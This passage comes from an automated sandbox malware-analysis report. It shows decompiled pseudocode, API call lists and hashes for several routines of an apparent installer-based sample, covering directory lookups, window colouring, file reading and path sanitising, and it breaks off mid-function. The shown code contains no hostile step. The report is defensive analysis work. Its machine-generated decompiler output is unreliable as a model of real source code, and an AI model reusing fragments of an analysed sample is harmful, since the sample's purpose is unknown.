                                                                                                                              0x0040671f
                                                                                                                              0x0040671f
                                                                                                                              0x0040673a
                                                                                                                              0x0040673d
                                                                                                                              0x00406701
                                                                                                                              0x00406702
                                                                                                                              0x00406702
                                                                                                                              0x00000000
                                                                                                                              0x0040673d
                                                                                                                              0x00406623
                                                                                                                              0x00406627
                                                                                                                              0x00406627
                                                                                                                              0x00406628
                                                                                                                              0x0040662a
                                                                                                                              0x00406667
                                                                                                                              0x0040666a
                                                                                                                              0x0040667a
                                                                                                                              0x0040667d
                                                                                                                              0x00406685
                                                                                                                              0x0040668b
                                                                                                                              0x0040668b
                                                                                                                              0x004066e6
                                                                                                                              0x004066e6
                                                                                                                              0x004066e8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040668f
                                                                                                                              0x00406694
                                                                                                                              0x00406695
                                                                                                                              0x00406697
                                                                                                                              0x004066ae
                                                                                                                              0x004066bc
                                                                                                                              0x004066c2
                                                                                                                              0x004066c4
                                                                                                                              0x004066e2
                                                                                                                              0x004066e2
                                                                                                                              0x004066e2
                                                                                                                              0x00000000
                                                                                                                              0x004066e2
                                                                                                                              0x004066ca
                                                                                                                              0x004066d3
                                                                                                                              0x004066d6
                                                                                                                              0x004066dc
                                                                                                                              0x004066e0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004066e0
                                                                                                                              0x004066a8
                                                                                                                              0x004066aa
                                                                                                                              0x004066ac
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004066ac
                                                                                                                              0x00000000
                                                                                                                              0x004066e6
                                                                                                                              0x00406672
                                                                                                                              0x00000000
                                                                                                                              0x0040662c
                                                                                                                              0x0040664a
                                                                                                                              0x00406653
                                                                                                                              0x004066f0
                                                                                                                              0x004066f4
                                                                                                                              0x004066fc
                                                                                                                              0x004066fc
                                                                                                                              0x00000000
                                                                                                                              0x004066f4
                                                                                                                              0x0040665d
                                                                                                                              0x004066ea
                                                                                                                              0x004066ee
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004066ee
                                                                                                                              0x0040662a
                                                                                                                              0x00000000
                                                                                                                              0x004065b7

                                                                                                                              APIs
                                                                                                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406672
                                                                                                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F28,?,004055B3,007A0F28,00000000,00000000,0079BD28,76D723A0), ref: 00406685
                                                                                                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
                                                                                                                              • lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                              • API String ID: 4260037668-1230650788
                                                                                                                              • Opcode ID: da38963e672fb73e568923eb237ce0014ee8c8129af21826515d3029acbe5ea3
                                                                                                                              • Instruction ID: 9e459ffa4d797bbc81f49b8710fc234ac44c95668d32beb4df18aeb57a87e6f9
                                                                                                                              • Opcode Fuzzy Hash: da38963e672fb73e568923eb237ce0014ee8c8129af21826515d3029acbe5ea3
                                                                                                                              • Instruction Fuzzy Hash: E061D271900206AADF109F64DC40BAE37A5AF55318F22C13BE917B72D0DB7D8AA1CB5D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004044DD Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E004044DD(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                                                                              0x004044ef
                                                                                                                              0x004045a5
                                                                                                                              0x00000000
                                                                                                                              0x004045a5
                                                                                                                              0x00404500
                                                                                                                              0x00404504
                                                                                                                              0x00000000
                                                                                                                              0x0040451e
                                                                                                                              0x0040451e
                                                                                                                              0x00404527
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404529
                                                                                                                              0x00404535
                                                                                                                              0x00404538
                                                                                                                              0x00404538
                                                                                                                              0x0040453e
                                                                                                                              0x00404544
                                                                                                                              0x00404544
                                                                                                                              0x00404550
                                                                                                                              0x00404556
                                                                                                                              0x0040455d
                                                                                                                              0x00404560
                                                                                                                              0x00404563
                                                                                                                              0x00404565
                                                                                                                              0x00404565
                                                                                                                              0x0040456d
                                                                                                                              0x00404573
                                                                                                                              0x00404573
                                                                                                                              0x0040457d
                                                                                                                              0x00404582
                                                                                                                              0x00404585
                                                                                                                              0x0040458a
                                                                                                                              0x0040458d
                                                                                                                              0x0040458d
                                                                                                                              0x0040459d
                                                                                                                              0x0040459d
                                                                                                                              0x00000000
                                                                                                                              0x004045a0

                                                                                                                              APIs
                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004044FA
                                                                                                                              • GetSysColor.USER32(00000000), ref: 00404538
                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00404544
                                                                                                                              • SetBkMode.GDI32(?,?), ref: 00404550
                                                                                                                              • GetSysColor.USER32(?), ref: 00404563
                                                                                                                              • SetBkColor.GDI32(?,?), ref: 00404573
                                                                                                                              • DeleteObject.GDI32(?), ref: 0040458D
                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404597
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2320649405-0
                                                                                                                              • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                              • Instruction ID: 307f0adb03de418db05ce456a6e98ecd908ab5abab62206e0655cd74099b0a55
                                                                                                                              • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                              • Instruction Fuzzy Hash: 702197B1501708BFD7309F28DD08B5BBBF8AF80714B00852EEA92A22E1D738D914CB54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 87%
                                                                                                                              			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x7a8ae8 =  *0x7a8ae8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E0040647A(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E004060EB( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E0040608D( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406461( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                                                                                              0x004026ec
                                                                                                                              0x004026ee
                                                                                                                              0x004026f1
                                                                                                                              0x004026f3
                                                                                                                              0x004026f6
                                                                                                                              0x004026fb
                                                                                                                              0x004026ff
                                                                                                                              0x00402702
                                                                                                                              0x00402705
                                                                                                                              0x00402c2a
                                                                                                                              0x00402c2d
                                                                                                                              0x0040270b
                                                                                                                              0x0040270b
                                                                                                                              0x00402712
                                                                                                                              0x00402714
                                                                                                                              0x00402714
                                                                                                                              0x0040271a
                                                                                                                              0x0040287e
                                                                                                                              0x0040287e
                                                                                                                              0x00402881
                                                                                                                              0x00402886
                                                                                                                              0x004015b6
                                                                                                                              0x0040292e
                                                                                                                              0x0040292e
                                                                                                                              0x00000000
                                                                                                                              0x00402720
                                                                                                                              0x00402721
                                                                                                                              0x0040272c
                                                                                                                              0x0040272f
                                                                                                                              0x0040273b
                                                                                                                              0x0040273f
                                                                                                                              0x004027d7
                                                                                                                              0x004027ef
                                                                                                                              0x004027ff
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00402745
                                                                                                                              0x00402745
                                                                                                                              0x00402748
                                                                                                                              0x00402749
                                                                                                                              0x0040274c
                                                                                                                              0x00402751
                                                                                                                              0x00402758
                                                                                                                              0x00402760
                                                                                                                              0x00000000
                                                                                                                              0x00402766
                                                                                                                              0x00402766
                                                                                                                              0x0040276b
                                                                                                                              0x00000000
                                                                                                                              0x00402771
                                                                                                                              0x00402771
                                                                                                                              0x00402779
                                                                                                                              0x0040277c
                                                                                                                              0x0040277f
                                                                                                                              0x0040283a
                                                                                                                              0x00402841
                                                                                                                              0x00402785
                                                                                                                              0x0040278b
                                                                                                                              0x00402797
                                                                                                                              0x00402801
                                                                                                                              0x00402801
                                                                                                                              0x00402799
                                                                                                                              0x00402799
                                                                                                                              0x0040279c
                                                                                                                              0x0040279e
                                                                                                                              0x0040279e
                                                                                                                              0x0040279e
                                                                                                                              0x004027a1
                                                                                                                              0x004027a6
                                                                                                                              0x004027a9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004027ab
                                                                                                                              0x004027ae
                                                                                                                              0x004027bc
                                                                                                                              0x004027c2
                                                                                                                              0x004027d0
                                                                                                                              0x00000000
                                                                                                                              0x004027d2
                                                                                                                              0x00000000
                                                                                                                              0x004027d2
                                                                                                                              0x00000000
                                                                                                                              0x004027d0
                                                                                                                              0x0040279e
                                                                                                                              0x00402804
                                                                                                                              0x00402807
                                                                                                                              0x00000000
                                                                                                                              0x00402809
                                                                                                                              0x0040280e
                                                                                                                              0x0040284f
                                                                                                                              0x00402871
                                                                                                                              0x00402878
                                                                                                                              0x0040285d
                                                                                                                              0x0040285d
                                                                                                                              0x00402860
                                                                                                                              0x00402863
                                                                                                                              0x00402866
                                                                                                                              0x00402866
                                                                                                                              0x00000000
                                                                                                                              0x00402817
                                                                                                                              0x00402817
                                                                                                                              0x0040281a
                                                                                                                              0x0040281d
                                                                                                                              0x00402823
                                                                                                                              0x00402827
                                                                                                                              0x0040282a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040282a
                                                                                                                              0x0040280e
                                                                                                                              0x00402807
                                                                                                                              0x0040277f
                                                                                                                              0x0040276b
                                                                                                                              0x00402760
                                                                                                                              0x00000000
                                                                                                                              0x0040282c
                                                                                                                              0x0040282c
                                                                                                                              0x0040282f
                                                                                                                              0x00402838
                                                                                                                              0x00000000
                                                                                                                              0x0040272f
                                                                                                                              0x0040271a
                                                                                                                              0x00402c33
                                                                                                                              0x00402c39

                                                                                                                              APIs
                                                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                                                • Part of subcall function 004060EB: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D1,00000000,00000000,?,00000000,00000011), ref: 00406101
                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                              • String ID: 9
                                                                                                                              • API String ID: 163830602-2366072709
                                                                                                                              • Opcode ID: 588ede5e84484d8860c92fb66ffae47e610f47b9ca95ac382e9d1b4b4742ae18
                                                                                                                              • Instruction ID: be08228a48e351455db253d3f5410474da148bca98ac48c4339161726040cff4
                                                                                                                              • Opcode Fuzzy Hash: 588ede5e84484d8860c92fb66ffae47e610f47b9ca95ac382e9d1b4b4742ae18
                                                                                                                              • Instruction Fuzzy Hash: 89510A75D00219AADF20EFD5CA88AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004067A1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 91%
                                                                                                                              			E004067A1(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E60(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E16(L"*?|<>/\":", _t5))) == 0) {
							E00405FC5(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                                              0x004067a3
                                                                                                                              0x004067ac
                                                                                                                              0x004067c3
                                                                                                                              0x004067c3
                                                                                                                              0x004067ca
                                                                                                                              0x004067d6
                                                                                                                              0x004067d6
                                                                                                                              0x004067d9
                                                                                                                              0x004067dc
                                                                                                                              0x004067e1
                                                                                                                              0x004067e3
                                                                                                                              0x004067ec
                                                                                                                              0x004067f0
                                                                                                                              0x0040680d
                                                                                                                              0x00406815
                                                                                                                              0x00406815
                                                                                                                              0x0040681a
                                                                                                                              0x0040681c
                                                                                                                              0x0040681f
                                                                                                                              0x00406824
                                                                                                                              0x00406825
                                                                                                                              0x00406829
                                                                                                                              0x00406829
                                                                                                                              0x0040682a
                                                                                                                              0x00406831
                                                                                                                              0x00406833
                                                                                                                              0x0040683a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406842
                                                                                                                              0x00406848
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406848
                                                                                                                              0x0040684d

                                                                                                                              APIs
                                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76D73420,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406804
                                                                                                                              • CharNextW.USER32(?,?,?,00000000,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406813
                                                                                                                              • CharNextW.USER32(?,00000000,76D73420,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406818
                                                                                                                              • CharPrevW.USER32(?,?,76D73420,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 0040682B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                              • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                              • API String ID: 589700163-2977677972
                                                                                                                              • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                              • Instruction ID: df5be6298df38fe53a3c1647d4a953459580f705d81a6df7816dadf9acb4bb56
                                                                                                                              • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                              • Instruction Fuzzy Hash: C0110D2680161295DB3037149D84A7766F8EF58BA4F56803FED86732C0F77C4C9286BD
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00404E31 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00404E31(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
